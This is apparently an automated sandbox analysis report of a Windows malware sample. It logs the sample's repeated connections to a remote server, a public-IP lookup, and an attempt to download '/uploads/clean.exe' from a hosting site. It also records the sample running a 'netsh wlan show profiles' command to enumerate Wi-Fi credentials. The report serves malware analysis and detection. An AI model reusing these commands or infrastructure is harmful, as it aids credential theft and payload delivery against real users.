                                                                    Dec 5, 2024 13:12:30.361460924 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:30.621357918 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:31.127238989 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:31.386558056 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:31.892487049 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:32.151690960 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:32.657892942 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:32.917184114 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:33.423348904 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:33.683070898 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:34.188986063 CET4977832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:34.448520899 CET320894977889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:34.954449892 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:35.213964939 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:35.719659090 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:35.980490923 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:36.485261917 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:36.745516062 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:37.250597000 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:37.510107040 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:38.016000986 CET4977932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:38.275681019 CET320894977989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:38.781790972 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:39.041183949 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:39.546889067 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:39.781801939 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:12:39.806143045 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:39.905786991 CET8049757104.16.185.241192.168.11.20
                                                                    Dec 5, 2024 13:12:39.905972958 CET4975780192.168.11.20104.16.185.241
                                                                    Dec 5, 2024 13:12:40.312324047 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:40.571620941 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:41.077866077 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:41.337076902 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:41.843246937 CET4978032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:42.102581024 CET320894978089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:42.608877897 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:42.868354082 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:43.374190092 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:43.633820057 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:44.139695883 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:44.399204016 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:44.905127048 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:45.164833069 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:45.670577049 CET4978132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:45.930186033 CET320894978189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:46.436144114 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:46.695452929 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:47.201523066 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:47.461103916 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:47.966975927 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:48.226327896 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:48.732388973 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:48.991954088 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:49.497857094 CET4978232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:49.757467985 CET320894978289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:50.263541937 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:50.522924900 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:51.028772116 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:51.287976027 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:51.841058969 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:52.100168943 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:52.637759924 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:52.897634029 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:53.530225039 CET4978332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:53.789341927 CET320894978389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:54.293792963 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:54.553005934 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:55.059150934 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:55.318543911 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:55.824628115 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:56.084131002 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:56.590019941 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:56.849216938 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:57.355453968 CET4978432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:57.614973068 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:58.121186972 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:58.386562109 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:58.886466980 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:59.146138906 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:59.651788950 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:59.911474943 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:00.417253017 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:00.679137945 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:01.182703018 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:01.442487955 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:01.948417902 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:02.208043098 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:02.713680029 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:02.973321915 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:03.479146957 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:03.739665985 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:04.244662046 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:04.504252911 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:05.010081053 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:05.269642115 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:05.775732040 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:06.047285080 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:06.556560993 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:06.816121101 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:07.322060108 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:07.581463099 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:08.087475061 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:08.346847057 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:08.852952957 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:09.112117052 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:09.618490934 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:09.878040075 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:10.383914948 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:10.643588066 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:11.149339914 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:11.408994913 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:11.914745092 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:12.178544998 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:12.680243015 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:12.940654039 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:13.445801020 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:13.705352068 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:14.211074114 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:14.470937014 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:14.976553917 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:15.236267090 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:15.742070913 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:16.002013922 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:16.507462978 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:16.767199039 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:17.273036957 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:17.532412052 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:18.038408041 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:18.297935963 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:18.803925991 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:19.063127041 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:19.569330931 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:19.828665018 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:20.334764957 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:20.594144106 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:21.100317001 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:21.360001087 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:21.865701914 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:22.125224113 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:22.631083965 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:22.892496109 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:23.396590948 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:23.656234026 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:24.161977053 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:24.421557903 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:24.927545071 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:25.186919928 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:25.692929983 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:25.953912020 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:26.458354950 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:26.717627048 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:27.223850012 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:27.483135939 CET320894979289.23.100.233192.168.11.20
Dec 5, 2024 13:13:27.989357948 CET | 49792 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:28.248495102 CET | 32089 | 49792 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:28.755037069 CET | 49793 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:29.014456034 CET | 32089 | 49793 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:29.520220041 CET | 49793 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:29.779881001 CET | 32089 | 49793 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:30.285655022 CET | 49793 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:30.545535088 CET | 32089 | 49793 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:31.051173925 CET | 49793 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:31.310815096 CET | 32089 | 49793 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:31.816595078 CET | 49793 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:32.076611996 CET | 32089 | 49793 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:32.582169056 CET | 49794 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:32.841578960 CET | 32089 | 49794 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:33.347503901 CET | 49794 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:33.607146025 CET | 32089 | 49794 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:34.113040924 CET | 49794 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:34.372587919 CET | 32089 | 49794 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:34.878412008 CET | 49794 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:35.137696981 CET | 32089 | 49794 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:35.643843889 CET | 49794 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:35.903440952 CET | 32089 | 49794 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:36.409437895 CET | 49795 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:36.671391010 CET | 32089 | 49795 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:37.174771070 CET | 49795 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:37.434092045 CET | 32089 | 49795 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:37.940207958 CET | 49795 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:38.199435949 CET | 32089 | 49795 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:38.705710888 CET | 49795 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:38.965111971 CET | 32089 | 49795 | 89.23.100.233 | 192.168.11.20
Dec 5, 2024 13:13:39.472027063 CET | 49795 | 32089 | 192.168.11.20 | 89.23.100.233
Dec 5, 2024 13:13:39.731317997 CET | 32089 | 49795 | 89.23.100.233 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 13:10:58.274389982 CET | 60497 | 53 | 192.168.11.20 | 1.1.1.1
Dec 5, 2024 13:10:58.451927900 CET | 53 | 60497 | 1.1.1.1 | 192.168.11.20
Dec 5, 2024 13:11:10.660809994 CET | 54374 | 53 | 192.168.11.20 | 1.1.1.1
Dec 5, 2024 13:11:10.785723925 CET | 53 | 54374 | 1.1.1.1 | 192.168.11.20
Dec 5, 2024 13:11:11.049704075 CET | 54609 | 53 | 192.168.11.20 | 1.1.1.1
Dec 5, 2024 13:11:11.174511909 CET | 53 | 54609 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 13:10:58.274389982 CET | 192.168.11.20 | 1.1.1.1 | 0x5e00 | Standard query (0) | orange-loris-425181.hostingersite.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 13:11:10.660809994 CET | 192.168.11.20 | 1.1.1.1 | 0xd57 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 13:11:11.049704075 CET | 192.168.11.20 | 1.1.1.1 | 0xc7f6 | Standard query (0) | 69.170.12.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 13:10:58.451927900 CET | 1.1.1.1 | 192.168.11.20 | 0x5e00 | No error (0) | orange-loris-425181.hostingersite.com | free.cdn.hstgr.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 13:10:58.451927900 CET | 1.1.1.1 | 192.168.11.20 | 0x5e00 | No error (0) | free.cdn.hstgr.net | | 84.32.84.100 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 13:11:10.785723925 CET | 1.1.1.1 | 192.168.11.20 | 0xd57 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 13:11:10.785723925 CET | 1.1.1.1 | 192.168.11.20 | 0xd57 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 13:11:11.174511909 CET | 1.1.1.1 | 192.168.11.20 | 0xc7f6 | Name error (3) | 69.170.12.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                                    • orange-loris-425181.hostingersite.com
                                                                    • icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49757 | 104.16.185.241 | 80 | 7544 | C:\Users\user\Desktop\iGxCM2I5u9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 13:11:10.910578966 CET | 63 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Dec 5, 2024 13:11:11.044116974 CET | 535 | IN | HTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 12:11:10 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=.TqQYcpRodu8XWSwyjFB1X1P9sq9WTaNrmZRl48QPLE-1733400670-1.0.1.1-L6JIdvaWbNNldMEojhZe1aj2D3CLFGQeZKMW4RDTYtCy7Q.CUNtxaW3MhLa9lMFZ3BWAT_mhErtX3ACJdHQjgA; path=/; expires=Thu, 05-Dec-24 12:41:10 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8ed3eff19b08da97-MIA
alt-svc: h3=":443"; ma=86400
Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
Data Ascii: 84.17.40.110


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49756 | 84.32.84.100 | 443 | 7544 | C:\Users\user\Desktop\iGxCM2I5u9.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 12:10:58 UTC | 104 | OUT | GET /uploads/clean.exe HTTP/1.1
Host: orange-loris-425181.hostingersite.com
Connection: Keep-Alive
2024-12-05 12:10:59 UTC | 392 | IN | HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 12:10:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
last-modified: Wed, 11 Jan 2023 12:29:40 GMT
etag: W/"999-63beabb4-5b41a25ab194c3b4;gz"
platform: hostinger
panel: hpanel
x-turbo-charged-by: LiteSpeed
Server: hcdn
x-hcdn-request-id: 209b163506b912c3746eb8f46d41577b-asc-edge5
2024-12-05 12:10:59 UTC | 977 | IN | Data Ascii: 999<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/n
2024-12-05 12:10:59 UTC | 1369 | IN | Data Ascii: nt="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all
2024-12-05 12:10:59 UTC | 123 | IN | Data Ascii: not a fault, just an accident that was not intentional.</p> </div> </div></body></html>0


Target ID: 0
Start time: 07:10:57
Start date: 05/12/2024
Path: C:\Users\user\Desktop\iGxCM2I5u9.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\iGxCM2I5u9.exe"
Imagebase: 0x1605ce50000
File size: 288'768 bytes
MD5 hash: 8C6FB38B219A123B9340465B8D2DD5F8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 2
Start time: 07:10:58
Start date: 05/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Imagebase: 0x7ff687340000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:10:59
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7d62b0000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:10:59
Start date: 05/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff77acb0000
File size: 14'848 bytes
MD5 hash: CA9A549C17932F9CAA154B5528EBD8D4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 07:10:59
Start date: 05/12/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff6c7630000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 07:10:59
Start date: 05/12/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr All
Imagebase: 0x7ff7358d0000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9aaa9e538336f5e07c33ce215b35fce6e210138f49cd171dd909931d6f546d6
                                                                      • Instruction ID: 02596ba25369522eea1cb6562422fcc98fb53ec7fdc4380ffec00b83b3de660a
                                                                      • Opcode Fuzzy Hash: c9aaa9e538336f5e07c33ce215b35fce6e210138f49cd171dd909931d6f546d6
                                                                      • Instruction Fuzzy Hash: 01B19470508A4E8FEBA8DF28D8457FA37D1FF55310F10423AE84DC7692CA75A945CB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ce4b7871e4dcf4b3a2d5766f2cb43f9b008c204f7e65dc6370664e76cf1adfd
                                                                      • Instruction ID: 5e790924632d83ae929f3e0091a8dd19c1d9722b7fbbeaff44c913bbf2808bc2
                                                                      • Opcode Fuzzy Hash: 8ce4b7871e4dcf4b3a2d5766f2cb43f9b008c204f7e65dc6370664e76cf1adfd
                                                                      • Instruction Fuzzy Hash: 4C516E70908A5D8FDB98DB58D845BE9BBF1FF59310F1082AAD04DD3252CA34A9848B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4361eb28af83bb626339781c4b2251182b0d273c3133893a5abadbecf82c1a2
                                                                      • Instruction ID: bcfb950149a246809cb71de454e08ce6cafd704b5516ca661be3619f2ba76b75
                                                                      • Opcode Fuzzy Hash: f4361eb28af83bb626339781c4b2251182b0d273c3133893a5abadbecf82c1a2
                                                                      • Instruction Fuzzy Hash: 3B51D070B0991E5FDB85FBBCC4492BA77E1EF9921174400BAE00EC76A2ED289C418710
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 253ae0f7f3f59d83892c627b7209756b8f7985b005f89e55eee6afe499ec7d92
                                                                      • Instruction ID: ec8476d905ff486e85f021f8cda9d2c433229c624466c55c0fcef3dc041801e1
                                                                      • Opcode Fuzzy Hash: 253ae0f7f3f59d83892c627b7209756b8f7985b005f89e55eee6afe499ec7d92
                                                                      • Instruction Fuzzy Hash: D3412670E09A1E5FE785EF78C80A6BF77E1EF45350B9404BDD40DC7692EE28A8428711
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2359bd72d9c407b6e35bb359ffe809da3d999587af844f8b5c61b48577f2963f
                                                                      • Instruction ID: 405c5397233321c0f8e742a96f79586e89b30e3b2ecc007e6d990ad27f48b507
                                                                      • Opcode Fuzzy Hash: 2359bd72d9c407b6e35bb359ffe809da3d999587af844f8b5c61b48577f2963f
                                                                      • Instruction Fuzzy Hash: 96514E7154EBCA5FD7439BB4C8250AABFF0EF13210B1904EED085CB5A3D65D184AC762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
